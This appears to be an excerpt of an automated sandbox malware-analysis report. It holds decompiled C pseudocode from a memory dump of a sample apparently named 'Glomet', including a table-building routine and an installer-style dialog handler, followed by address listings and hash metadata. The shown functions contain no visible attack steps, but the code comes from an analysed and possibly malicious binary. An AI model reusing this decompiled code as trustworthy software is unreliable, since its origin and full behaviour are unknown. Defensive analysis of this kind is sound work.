							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6a8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6a8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                                                                                                                              0x0040728a
                                                                                                                                                                              0x00407292
                                                                                                                                                                              0x00407296
                                                                                                                                                                              0x00407298
                                                                                                                                                                              0x0040729b
                                                                                                                                                                              0x0040729d
                                                                                                                                                                              0x0040729d
                                                                                                                                                                              0x0040729f
                                                                                                                                                                              0x004072a6
                                                                                                                                                                              0x004072a8
                                                                                                                                                                              0x004072a8
                                                                                                                                                                              0x004072ae
                                                                                                                                                                              0x004072c3
                                                                                                                                                                              0x004072cb
                                                                                                                                                                              0x004072cd
                                                                                                                                                                              0x004072cf
                                                                                                                                                                              0x004072d2
                                                                                                                                                                              0x004072d3
                                                                                                                                                                              0x004072d3
                                                                                                                                                                              0x004072d9
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004072db
                                                                                                                                                                              0x004072de
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004072de
                                                                                                                                                                              0x004072e2
                                                                                                                                                                              0x004072e5
                                                                                                                                                                              0x004072e7
                                                                                                                                                                              0x004072e7
                                                                                                                                                                              0x004072ea
                                                                                                                                                                              0x004072f0
                                                                                                                                                                              0x004072f1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004072f1
                                                                                                                                                                              0x004072f6
                                                                                                                                                                              0x004072f9
                                                                                                                                                                              0x004072fb
                                                                                                                                                                              0x004072fb
                                                                                                                                                                              0x00407301
                                                                                                                                                                              0x00407303
                                                                                                                                                                              0x00407314
                                                                                                                                                                              0x00407307
                                                                                                                                                                              0x0040730b
                                                                                                                                                                              0x004075b0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004075b0
                                                                                                                                                                              0x00407311
                                                                                                                                                                              0x00407312
                                                                                                                                                                              0x00407312
                                                                                                                                                                              0x0040731a
                                                                                                                                                                              0x0040731d
                                                                                                                                                                              0x00407321
                                                                                                                                                                              0x00407323
                                                                                                                                                                              0x00407325
                                                                                                                                                                              0x00407328
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407330
                                                                                                                                                                              0x00407336
                                                                                                                                                                              0x00407338
                                                                                                                                                                              0x0040733a
                                                                                                                                                                              0x0040733b
                                                                                                                                                                              0x00407350
                                                                                                                                                                              0x00407350
                                                                                                                                                                              0x00407353
                                                                                                                                                                              0x00407355
                                                                                                                                                                              0x00407355
                                                                                                                                                                              0x00407357
                                                                                                                                                                              0x0040735c
                                                                                                                                                                              0x0040735e
                                                                                                                                                                              0x00407365
                                                                                                                                                                              0x00407367
                                                                                                                                                                              0x0040736f
                                                                                                                                                                              0x0040736f
                                                                                                                                                                              0x00407371
                                                                                                                                                                              0x00407372
                                                                                                                                                                              0x00407381
                                                                                                                                                                              0x00407385
                                                                                                                                                                              0x00407389
                                                                                                                                                                              0x0040738c
                                                                                                                                                                              0x0040738f
                                                                                                                                                                              0x00407394
                                                                                                                                                                              0x00407397
                                                                                                                                                                              0x0040739d
                                                                                                                                                                              0x004073a4
                                                                                                                                                                              0x004073aa
                                                                                                                                                                              0x004075a3
                                                                                                                                                                              0x004075a3
                                                                                                                                                                              0x004075a8
                                                                                                                                                                              0x004075b7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004075a8
                                                                                                                                                                              0x004073b7
                                                                                                                                                                              0x004073ba
                                                                                                                                                                              0x004073bd
                                                                                                                                                                              0x004073c0
                                                                                                                                                                              0x004073c4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004073cf
                                                                                                                                                                              0x004073d2
                                                                                                                                                                              0x004073d3
                                                                                                                                                                              0x004073d5
                                                                                                                                                                              0x004073db
                                                                                                                                                                              0x004073de
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004073e4
                                                                                                                                                                              0x004073e5
                                                                                                                                                                              0x004073e8
                                                                                                                                                                              0x004073eb
                                                                                                                                                                              0x004073ee
                                                                                                                                                                              0x004073f4
                                                                                                                                                                              0x004073f6
                                                                                                                                                                              0x004073f6
                                                                                                                                                                              0x004073fe
                                                                                                                                                                              0x00407402
                                                                                                                                                                              0x00407407
                                                                                                                                                                              0x0040742c
                                                                                                                                                                              0x00407432
                                                                                                                                                                              0x00407434
                                                                                                                                                                              0x00407436
                                                                                                                                                                              0x00407439
                                                                                                                                                                              0x00407442
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407409
                                                                                                                                                                              0x00407409
                                                                                                                                                                              0x00407412
                                                                                                                                                                              0x00407416
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407427
                                                                                                                                                                              0x00407427
                                                                                                                                                                              0x0040742a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040741a
                                                                                                                                                                              0x0040741d
                                                                                                                                                                              0x0040741f
                                                                                                                                                                              0x00407423
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407425
                                                                                                                                                                              0x00407425
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407427
                                                                                                                                                                              0x0040744b
                                                                                                                                                                              0x00407451
                                                                                                                                                                              0x0040745b
                                                                                                                                                                              0x0040745d
                                                                                                                                                                              0x00407462
                                                                                                                                                                              0x00407464
                                                                                                                                                                              0x0040749a
                                                                                                                                                                              0x00407466
                                                                                                                                                                              0x00407466
                                                                                                                                                                              0x00407469
                                                                                                                                                                              0x0040746c
                                                                                                                                                                              0x00407476
                                                                                                                                                                              0x00407479
                                                                                                                                                                              0x00407480
                                                                                                                                                                              0x0040748b
                                                                                                                                                                              0x00407492
                                                                                                                                                                              0x00407492
                                                                                                                                                                              0x0040749c
                                                                                                                                                                              0x0040749f
                                                                                                                                                                              0x004074a1
                                                                                                                                                                              0x004074a7
                                                                                                                                                                              0x004074a7
                                                                                                                                                                              0x004074b0
                                                                                                                                                                              0x004074b3
                                                                                                                                                                              0x004074b8
                                                                                                                                                                              0x004074c7
                                                                                                                                                                              0x004074cf
                                                                                                                                                                              0x004074d4
                                                                                                                                                                              0x004074f8
                                                                                                                                                                              0x00407500
                                                                                                                                                                              0x00407504
                                                                                                                                                                              0x0040750a
                                                                                                                                                                              0x004074d6
                                                                                                                                                                              0x004074e4
                                                                                                                                                                              0x004074e7
                                                                                                                                                                              0x004074ed
                                                                                                                                                                              0x004074ed
                                                                                                                                                                              0x0040750e
                                                                                                                                                                              0x004074c9
                                                                                                                                                                              0x004074c9
                                                                                                                                                                              0x004074c9
                                                                                                                                                                              0x0040751f
                                                                                                                                                                              0x00407523
                                                                                                                                                                              0x0040752f
                                                                                                                                                                              0x0040752a
                                                                                                                                                                              0x0040752d
                                                                                                                                                                              0x0040752d
                                                                                                                                                                              0x00407537
                                                                                                                                                                              0x0040753c
                                                                                                                                                                              0x00407544
                                                                                                                                                                              0x00407540
                                                                                                                                                                              0x00407542
                                                                                                                                                                              0x00407542
                                                                                                                                                                              0x0040754a
                                                                                                                                                                              0x0040754c
                                                                                                                                                                              0x00407553
                                                                                                                                                                              0x0040755d
                                                                                                                                                                              0x00407567
                                                                                                                                                                              0x00407583
                                                                                                                                                                              0x00407587
                                                                                                                                                                              0x004073cc
                                                                                                                                                                              0x004073d2
                                                                                                                                                                              0x004073d3
                                                                                                                                                                              0x004073d5
                                                                                                                                                                              0x004073db
                                                                                                                                                                              0x004073de
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004073de
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407569
                                                                                                                                                                              0x00407569
                                                                                                                                                                              0x00407569
                                                                                                                                                                              0x0040756e
                                                                                                                                                                              0x00407577
                                                                                                                                                                              0x00407580
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407580
                                                                                                                                                                              0x0040758d
                                                                                                                                                                              0x0040758d
                                                                                                                                                                              0x00407590
                                                                                                                                                                              0x00407597
                                                                                                                                                                              0x0040759a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004073bd
                                                                                                                                                                              0x0040733d
                                                                                                                                                                              0x0040733f
                                                                                                                                                                              0x0040733f
                                                                                                                                                                              0x00407343
                                                                                                                                                                              0x00407346
                                                                                                                                                                              0x00407347
                                                                                                                                                                              0x00407347
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040733f
                                                                                                                                                                              0x004072b3
                                                                                                                                                                              0x004072b9
                                                                                                                                                                              0x00000000

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                                                                                                                              • Instruction ID: 973a31ab38dbc5c4480f1d9ea431a22b3101bf508bc4e87126308f85d1407ce0
                                                                                                                                                                              • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                                                                                                                              • Instruction Fuzzy Hash: 03C13631E042199BCF18CF68D8905EEBBB2FF89314F25866AD85677380D734A942CB95
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00404CD9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                              			E00404CD9(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				void* _t205;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t287;
				long _t290;
				void* _t291;
				signed int _t300;
				signed int _t308;
				void* _t309;
				void* _t310;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f448;
				_v28 =  *0x42f430 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f439 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404C27(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f438) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a874; // 0x0
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a888; // 0x0
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a874 = 0;
								 *0x42a888 = 0;
								 *0x42f480 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f439 & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA7();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_t205 =  *0x42a888; // 0x0
									_v36 = _t205;
									_t206 =  *0x42f448;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f44c <= 0) {
										L86:
										if( *0x42f4de == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ebfc; // 0x5a1993
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BE2(0x3ff, 0xfffffffb, E00404BFA(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f44c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a888);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f480 = _a4;
					_v20 = 2;
					 *0x42a888 = GlobalAlloc(0x40,  *0x42f44c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a87c =  *0x42a87c | 0xffffffff;
					_v16 = _t264;
					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E004052EC);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a874 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062EA(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042D4(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042D4(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f44c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										_t287 = SendMessageA(_v8, 0x1100, 0,  &_v88);
										_t309 =  *0x42a888; // 0x0
										 *(_t309 + _t329 * 4) = _t287;
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_t310 =  *0x42a888; // 0x0
									_v36 = 1;
									 *(_t310 + _t329 * 4) = _t290;
									_t291 =  *0x42a888; // 0x0
									_v16 =  *(_t291 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f44c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E00404309(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404309(_v12);
								L93:
								return E0040433B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}































































                                                                                                                                                                              0x00404cf7
                                                                                                                                                                              0x00404cff
                                                                                                                                                                              0x00404d07
                                                                                                                                                                              0x00404d0d
                                                                                                                                                                              0x00404d25
                                                                                                                                                                              0x00404d28
                                                                                                                                                                              0x00404d29
                                                                                                                                                                              0x00404f56
                                                                                                                                                                              0x00404f5d
                                                                                                                                                                              0x00404f71
                                                                                                                                                                              0x00404f5f
                                                                                                                                                                              0x00404f61
                                                                                                                                                                              0x00404f64
                                                                                                                                                                              0x00404f65
                                                                                                                                                                              0x00404f6c
                                                                                                                                                                              0x00404f6c
                                                                                                                                                                              0x00404f7d
                                                                                                                                                                              0x00404f8b
                                                                                                                                                                              0x00404f8e
                                                                                                                                                                              0x00404fa4
                                                                                                                                                                              0x00405019
                                                                                                                                                                              0x0040501c
                                                                                                                                                                              0x0040501e
                                                                                                                                                                              0x00405028
                                                                                                                                                                              0x00405036
                                                                                                                                                                              0x00405036
                                                                                                                                                                              0x00405038
                                                                                                                                                                              0x00405042
                                                                                                                                                                              0x00405048
                                                                                                                                                                              0x0040504b
                                                                                                                                                                              0x0040504e
                                                                                                                                                                              0x00405069
                                                                                                                                                                              0x00405050
                                                                                                                                                                              0x0040505a
                                                                                                                                                                              0x0040505a
                                                                                                                                                                              0x0040504e
                                                                                                                                                                              0x00405042
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040501c
                                                                                                                                                                              0x00404fa9
                                                                                                                                                                              0x00404fb4
                                                                                                                                                                              0x00404fb9
                                                                                                                                                                              0x00404fc0
                                                                                                                                                                              0x00404fc5
                                                                                                                                                                              0x00404fc9
                                                                                                                                                                              0x00404fd4
                                                                                                                                                                              0x00404fd4
                                                                                                                                                                              0x00404fd8
                                                                                                                                                                              0x00404fdc
                                                                                                                                                                              0x00404fe0
                                                                                                                                                                              0x00404ff3
                                                                                                                                                                              0x00404fe2
                                                                                                                                                                              0x00404fe2
                                                                                                                                                                              0x00404fe9
                                                                                                                                                                              0x00404fef
                                                                                                                                                                              0x00404feb
                                                                                                                                                                              0x00404feb
                                                                                                                                                                              0x00404feb
                                                                                                                                                                              0x00404fe9
                                                                                                                                                                              0x00404ff7
                                                                                                                                                                              0x00404ff9
                                                                                                                                                                              0x0040500c
                                                                                                                                                                              0x0040500f
                                                                                                                                                                              0x00405012
                                                                                                                                                                              0x00405012
                                                                                                                                                                              0x00404fdc
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404fc9
                                                                                                                                                                              0x00404fab
                                                                                                                                                                              0x00404fb2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040506c
                                                                                                                                                                              0x0040506c
                                                                                                                                                                              0x00405073
                                                                                                                                                                              0x004050e4
                                                                                                                                                                              0x004050ec
                                                                                                                                                                              0x004050f4
                                                                                                                                                                              0x004050f4
                                                                                                                                                                              0x004050fd
                                                                                                                                                                              0x004050ff
                                                                                                                                                                              0x00405106
                                                                                                                                                                              0x00405109
                                                                                                                                                                              0x00405109
                                                                                                                                                                              0x0040510f
                                                                                                                                                                              0x00405116
                                                                                                                                                                              0x00405119
                                                                                                                                                                              0x00405119
                                                                                                                                                                              0x0040511f
                                                                                                                                                                              0x00405125
                                                                                                                                                                              0x0040512b
                                                                                                                                                                              0x0040512b
                                                                                                                                                                              0x00405138
                                                                                                                                                                              0x00405299
                                                                                                                                                                              0x004052a0
                                                                                                                                                                              0x004052bd
                                                                                                                                                                              0x004052c3
                                                                                                                                                                              0x004052d5
                                                                                                                                                                              0x004052d5
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040513e
                                                                                                                                                                              0x00405140
                                                                                                                                                                              0x00405145
                                                                                                                                                                              0x0040514a
                                                                                                                                                                              0x0040514f
                                                                                                                                                                              0x00405151
                                                                                                                                                                              0x00405151
                                                                                                                                                                              0x00405152
                                                                                                                                                                              0x00405153
                                                                                                                                                                              0x00405155
